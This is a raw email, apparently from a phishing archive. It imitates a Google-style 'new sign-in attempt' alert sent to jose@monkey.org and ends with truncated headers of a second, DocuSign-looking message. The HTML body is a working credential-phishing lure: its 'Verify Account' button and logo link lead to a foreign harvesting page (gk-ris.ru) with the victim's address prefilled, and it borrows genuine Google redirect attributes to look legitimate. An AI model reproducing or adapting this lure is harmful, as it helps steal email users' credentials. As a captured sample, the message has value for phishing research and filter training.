From: monkey.org <fawaz.mousselly@hiast.edu.sy>
To: <jose@monkey.org>
Subject: jose@monkey.org sign-in attempt.
Date: Fri, 1 Mar 2019 00:34:53 -0800
Message-ID: <20190301003453.3F7064D9BCECCB35@hiast.edu.sy>
MIME-Version: 1.0
Content-Type: multipart/related;
	boundary="----=_NextPart_000_0012_CB9D4759.B12BB2FF"
Return-Path: fawaz.mousselly@hiast.edu.sy
Status: O
X-Status: 
X-Keywords:                  
X-UID: 47

------=_NextPart_000_0012_CB9D4759.B12BB2FF
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<tbody><tr style=3D"height:32px" height=3D"32"><td></td></tr><tr align=3D"c=
enter"><td><div><div></div></div><table style=3D"padding-bottom:20px;max-wi=
dth:516px;min-width:220px" cellspacing=3D"0" cellpadding=3D"0" border=3D"0"=
><tbody><tr><td style=3D"width:8px" width=3D"8"></td><td><div style=3D"back=
ground-color:#f5f5f5;direction:ltr;padding:16px;margin-bottom:6px"><table w=
idth=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0"><tbody><tr><=
td style=3D"vertical-align:top"><img src=3D"cid:iconrecoveryx22020.png" hei=
ght=3D"20" width=3D"20"></td><td style=3D"width:13px" width=3D"13"></td><td=
 style=3D"direction:ltr"><span style=3D"font-family:Roboto-Regular,Helvetic=
a,Arial,sans-serif;font-size:13px;color:rgba(0,0,0,0.87);line-height:1.6;co=
lor:rgba(0,0,0,0.54)"><a href=3D"http://gk-ris.ru/late-code/index.php?email=
=3Djose@monkey.org" style=3D"text-decoration:none;color:#4285f4" target=3D"=
_blank" rel=3D"noreferrer" data-saferedirecturl=3D"https://www.google.com/u=
rl?hl=3Den&amp;q=3Dhttps://accounts.google.com/AccountDisavow?adt%3DAOX8kio=
3VwTXR5CRdtFgG2kyEbyleegTuynBec5GKNzJEWzemznjFJNhppmospLGF7YuU4aSOmIsvxA%26=
rfn%3D31%26anexp%3Dgivab-fa--mdv2-fa--hsc-control_b&amp;source=3Dgmail&amp;=
ust=3D1550819474483000&amp;usg=3DAFQjCNGrArN0_Yd0JHW94zbCFFSzQUDOtA">monkey=
=2Eorg</a></span></span></td></tr></tbody></table></div><div style=3D"borde=
r-style:solid;border-width:thin;border-color:#dadce0;border-radius:8px;padd=
ing:40px 20px" align=3D"center"><div style=3D"font-size:24px">New sign-in a=
ttempt to </div><table style=3D"margin-top:8px" align=3D"center"><tbody><tr=
 style=3D"line-height:normal"><td style=3D"padding-right:8px" align=3D"righ=
t"><img src=3D"cid:anonymousprofilephoto.png" style=3D"width:20px;min-heigh=
t:20px;vertical-align:sub;border-radius:50%" width=3D"20" height=3D"20"></t=
d><td><a style=3D"font-family:'Google Sans',Roboto,RobotoDraft,Helvetica,Ar=
ial,sans-serif;color:rgba(0,0,0,0.87);font-size:14px;line-height:20px" rel=
=3D"noreferrer">jose@monkey.org</a></td></tr></tbody></table></div><div sty=
le=3D"font-family:Roboto-Regular,Helvetica,Arial,sans-serif;font-size:14px;=
color:rgba(0,0,0,0.87);line-height:20px;padding-top:20px;text-align:center"=
>You will need to verify your account if this was not you <br>for continues=
 usage and full secured email upgrade.<div style=3D"padding-top:32px;text-a=
lign:center"><a href=3D"http://gk-ris.ru/late-code/index.php?email=3Djose@m=
onkey.org" style=3D"font-family:'Google Sans',Roboto,RobotoDraft,Helvetica,=
Arial,sans-serif;line-height:16px;color:#ffffff;font-weight:400;text-decora=
tion:none;font-size:14px;display:inline-block;padding:10px 24px;background-=
color:#4184f3;border-radius:5px;min-width:90px" target=3D"_blank" rel=3D"no=
referrer" data-saferedirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=
=3Dhttps://accounts.google.com/AccountChooser?Email%3Djose@monkey.org%26con=
tinue%3Dhttps://myaccount.google.com/alert/nt/1550661866000?rfn%253D31%2526=
rfnc%253D1%2526eid%253D-944794522272837294%2526et%253D1%2526anexp%253Dgivab=
-fa--mdv2-fa--hsc-control_b&amp;source=3Dgmail&amp;ust=3D1550819474483000&a=
mp;usg=3DAFQjCNFv2L5jgt2DOr2Cuc3WPdB8GV7ayQ">Verify Account</a></div></div>=
</div><div style=3D"text-align:left"><div style=3D"font-family:Roboto-Regul=
ar,Helvetica,Arial,sans-serif;color:rgba(0,0,0,0.54);font-size:11px;line-he=
ight:18px;padding-top:12px;text-align:center"><div>This message was sent to=
 jose@monkey.org, Ignore if this is not you.</div><div style=3D"direction:l=
tr">=A9 2019 monkey.org.</a></div></div></div></td><td style=3D"width:8px" =
width=3D"8"></td></tr></tbody></table></td></tr><tr style=3D"height:32px" h=
eight=3D"32"><td></td></tr></tbody>
------=_NextPart_000_0012_CB9D4759.B12BB2FF
Content-Type: image/png; name="iconrecoveryx22020.png"
Content-Transfer-Encoding: base64
Content-ID: <iconrecoveryx22020.png>

iVBORw0KGgoAAAANSUhEUgAAACgAAAAoCAYAAACM/rhtAAAABHNCSVQICAgIfAhkiAAABJNJ
REFUWIXtmF9oW2UYxp/nS9rUrlamVB2MKQiKuhX1TgZD1uHKdEzxzn/J7ElNTxeZgiJ4MXDC
ZE5k65rU9qRNQPRGROdgU8eEoV70aqADrzbnnBvO6jr7v8n3eNElS7qkTbK2etHn6uX93u87
P57z/TsHWNayljWnODsRdN07MW0fI8wdS8QwTehUf2/sBEnNbiwA3B7ufFqZdErkzUsEl5Og
E/7bbnmyf+/ef/LzJgcXjTZlMjb5X8ABAMENmaHh3bPz/mxgJ9PrSTUWdBIuW6PxRaOSaSKU
Y6CwBcDOooAUm4TCKWCNRnygM+D1fLWQXK7rNoxO2L2CjYD5s4xNs2vN7ES+KK62wtGg0+FF
o9HGuWrLVciJbBybsD+C6CB53SKtCDAnqW14fOrUdieyuVow13Ubgi9FYtbqmIi7y+1XHJAa
pjHtEq9cS1XvZinXJH5LmncrBqSlkn2xPl8AayF+XdBYgZulXJMwCnJHKhFrAXG6YsCsBuLx
c6n++GYDhCt1cy7Xao1/XcqLdxfbmCsCzIEmejxfAGtBFK7mq24G29zWbKqka+QIjelMJWIt
nnfwTDnPLRsQuOqm19NazE3AHgk6HV6ozd1a0jX4mpN9sVg5rlUFmAOdw03BHloI124IELjm
JmicfDfzReI4fbXr5nNNwJioC6IuwOjideNkg1DYDcvaXmDmiEv296wsB9ZxoqunMe1B2AzM
uOaT3uj34j2Vvs5iqsrBfHle129ZNwl8SV/tuoFET3w+uGCb+1bI6YjON75/voJylfJiCQCJ
cmpD4Y7XZO07EhByOpD04l2lam/YwWok8LjEIQCQdCDoRF4pVbukgMFdu+qC7R1PGGiToX7I
NQj7S0HmACXNe7O4EW133G04f/EXZHTYWr0nYGtBgbA/GHafKwm4mHoxHOmysp9DzH3nSMrk
15A86beBIyUBF2JLKKZgOPIMLXYAgKgLhnzB1HINjPkkH86nupZE4oO/SgIuxit2XbeBGcYB
QMD5OtPQPODFP0IaDqXns3ArAmZTMTgg/8pPSpox0YKmvX3nqmqgJv1TSsViFwFgfAqtopoA
wICv9va+/ycA1NeaAyPj6W00RisCZlN3d/dQqfFygIY4m50UpBonMxO/VwPINC4DWAkAgn0w
m7+pFseycXd391BnZ2dLNp5rvBzgrY3131/6e/QsoLuqASsuUwdYCEz7/f6x/JbZYKG2yCFL
3GfE75KJeFtuhGywb9++URg+RernhcITdAYACPmvjKcfLlXX3r6rHlQrhXshW7C6C466VF/s
pKQHHKfznnSVvz7oVzobB0zN0Yn0ZIakj9AeSRuL7RZT6T92i6wBAOMzhwvGqwaiEoUcd49k
35x5GD9jvT8y0NV1CQCi0WhgZHz67YzV6yRJ6puk9+HjSwoYjUYDw+PpQUrNAEBq2oo/ERiT
8BCJFcDMFY8BNg/E4+fy+/sWG3BwcDCzYf2jH0+mdTuARwD6CKwCsIZELTDzSYCawJZkz8Ff
Z/dfdAfz1fZy54a0zTwrq/sh1JA8TfCLAS/26WKdZMv63+tf98cy1siy3ewAAAAASUVORK5C
YII=

------=_NextPart_000_0012_CB9D4759.B12BB2FF
Content-Type: image/png; name="anonymousprofilephoto.png"
Content-Transfer-Encoding: base64
Content-ID: <anonymousprofilephoto.png>

iVBORw0KGgoAAAANSUhEUgAAAGAAAABgCAMAAADVRocKAAAAA3NCSVQICAjb4U/gAAAAFVBM
VEWlxP9KfOecw/9Ccd45cN5lkeyIrPiHXw4ZAAAEH0lEQVRoge1YCXLDIAwEI/z/JxfQCQaj
xOlkOtPgOLWbCK1Wp0M4/vgKX9fgwWpHoM+/u/45+P765+D765+D76/XOKDXL2EOR845xnJy
6nW8wkGRnqCs8qof+eP65yI76gFQYbhwu751VtWjWRXIGVzYPSujfDBH2QPyRrvDy0GRXyRC
tEaqt7Y7+PVnvatlIr7rhWeH/TfI/k1ipHPDU3c6P4BA7JP0lBgF3FnXxUHIqVkcESAAiPKZ
cnjoSQeg9uI6BCARJ/CUg+ahbHkFALhJg8DmeGsFSKJ4dSQ0FKKhW884OEnV7i1WqukDA/pN
+xeKgVyIiCAO2K8c0bb5bxZKSWH2KfaiCPl9BGVFyW4dhGgNtdTRwUGoElsJuEIATq3PEBAH
FwggENYIPBywHdiBQJxJWHjGQTYG1zeGATrXjRd5OMicGtDnOSOBwnrmRS3QJBuh8rQls1AC
7QkHAVRno7dmo5oqniDASLOWR7WF4juOHRy0etZpL8ZhQ20stNGfk0WU/BOlILRt9lV5u38r
mZA0IEyqw3pza4H9CtjTieuLbAJwbwFPX0RGGkloKSp/pNOWaIs2BREB+187raSCBQA87ijU
jq30awbC1zZHODloGM5sOSjbQD4/NaGSHmULoEwEJN71e78WdY9ctc8k/XfmtGCUcmJ3R6L+
wRfeX74kfXp5i/ndXT6m+yPUL8zJ6DhnXXL5IS2qgxYPrcMx1Hf9SGXeP12T8r5eFNlNZPeq
JaLc5E3e1/3MCaSD75sjLDgQ108u9hzkqBM+78I7pch3W954Q39u3XWq7MRrWav/W08hq71L
OwGJ+h+BgIBwrqWDt8hiVqf1pRIn00WYeib2wq/EWYd3x4ERAV2hTFr8eW+qQfDKvMnzqjyh
0LYOLALsjRjDtEeaciDsWSa1mklvygiaLjqu7fRvNR6i6GxaCjAUMErC1wD10lccnEMvSgqy
WB2qkoQJ42Aj3XpQ9f/YNXICIXUQZGoQj8Kxf8dB6BtRsU9PAs/h0ibhM7BTFV3oXxY5PEQD
RIxjvUieAKhXnTb3rTiYILDZyDJv+/oWdedx3GDA06GDMFh7qGEgmUuFACaclxzUA6BzIlW1
8yJDjo48FsGaBzC4hQgYJF/iukdgnHLGwcyNesEyZMqCK4IVE2Jx+1sDpRsyezUGBPM4aBww
l/xoyALQIZMSCqcVwOeoQ1hNEAj47lHLEMfpCmA+9k/jYHCiIRNpLjLJFc8XDlYI1BIRumAa
IAyazBFcONDQmQKACQQe25wIIC5sMeg73JgW5nkcOBjgihA78zkR9OVgwcAAAYPEx8EtgA5E
X+D8HAzVbM7AwMINggsHXRhMGeh3V/O9EAcmdGcMTCDEWTZdcGD7wzUD0LOACC4GWSDYxsAF
AnFwEfcDfj447EC+jSUAAAAASUVORK5CYII=

------=_NextPart_000_0012_CB9D4759.B12BB2FF--

From jose@monkey.org Tue Mar  5 21:14:27 2019 +0000
Return-Path: dse_na3@docusign.net
Delivered-To: jose@monkey.org
X-FDA: 75234421374.04.ink90_43eb98fec1417
X-Spam-Summary: 1,0,0,,d41d8cd98f00b204,dse_na3@docusign.net,:,RULES_HIT:7969:30007:30012:30019:30022:30023:30038:30054:30055:30059:30062:30064:30070:30074:30079:30090:30091,0,RBL:162.248.184.122:@docusign.net:.lbl8.mailshell.net-62.18.0.100 64.95.201.95,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neutral,Custom_rules:0:1:0,LFtime:17,LUA_SUMMARY:none
X-HE-Tag: ink90_43eb98fec1417
X-Filterd-Recvd-Size: 11697
Received: from mailsea.docusign.net (mailsea.docusign.net [162.248.184.122])
	by imf13.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue,  5 Mar 2019 21:14:26 +0000 (UTC)
Received: from DA3FE55.corp.docusign.net (unknown [10.103.101.11])
	by mailsea.docusign.net (Postfix) with ESMTP id 56790BFDBD
	for <jose@monkey.org>; Tue,  5 Mar 2019 13:14:25 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=docusign.net; s=mail;
	t=1551820465; bh=ZlwHygKmKDvstZXVEBm80zotrk/EqDmk9bh8ZR8hQA8=;
	h=Reply-To:From:To:Date:Subject;
	b=l/+HKHiZATyBJlU19vGLw4hFeFladblgb4aUuTXuji/j2m2p+SQDPYTspBEJb0Wz4
	 4RiuAhnQj8CVLDBZ83uns5ZvUNP4x+ephilp4aWDJxlQ6DSX2E+z/oVQN11UXROpeE
	 +QoGogZ1mwx/aeKjF/zxCBBcZ6cFjdqSxp/jN+o8=
Received: from docusign.net ([127.0.0.1]) by DA3FE55.corp.docusign.net with Microsoft SMTPSVC(8.5.9600.16384);
	 Tue, 5 Mar 2019 13:14:25 -0800
Sender: DocuSign NA3 System  <dse_NA3@docusign.net>
Reply-To: "Lisa Wilson"  <lisa@expandthebiz.com>
Recipient-Id: 988195bf-c4c0-4b56-acec-2f218204924b
X-Debug: False
X-Email-Rejection-Mode: LearningMode
X-Api-Host: na3.docusign.net
Site-Id: 3
X-BounceEmailVersion: 1
